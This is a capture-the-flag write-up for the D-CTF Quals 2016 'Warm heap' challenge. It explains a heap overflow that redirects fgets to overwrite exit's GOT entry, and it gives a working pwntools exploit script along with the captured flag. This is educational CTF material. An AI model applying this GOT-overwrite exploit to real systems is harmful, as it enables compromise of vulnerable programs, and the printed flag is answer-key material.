The force is with those who read the source.

D-CTF Quals 2016: Warm heap (Exploit 100)

2016-10-04
writeup
D-CTF Quals/GOT/heap overflow/pwn/x86-64

Description

10.13.37.21:1337
https://dctf.def.camp/quals-2016/exp100.bin

Exploit

warm_heap_1.png

The binary malloc four chunks as the figure shown above. The first and the third chunks contain a pointer to the second and the fourth chunks respectively. Then, it will invoke two fgets to these two pointers. We can make use of the buffer overflow bug of the first fgets to change the destination of the second fgets. By changing the value of the GOT of exit to the embedded print-flag function, we can get the flag easily.

warm_heap_exp.pydownload
1
2
3
4
5
6
7
8
9
10
from pwn import *

exit_got = 0x601068
flag = 0x400826

r = remote('10.13.37.21', 1337)

r.sendline('A'*40 + p64(exit_got))
r.sendline(p64(flag))
print r.recvall()

Flag: DCTF{b94c21ff7531cba35a498cb074918b3e}

Blog comments powered by Disqus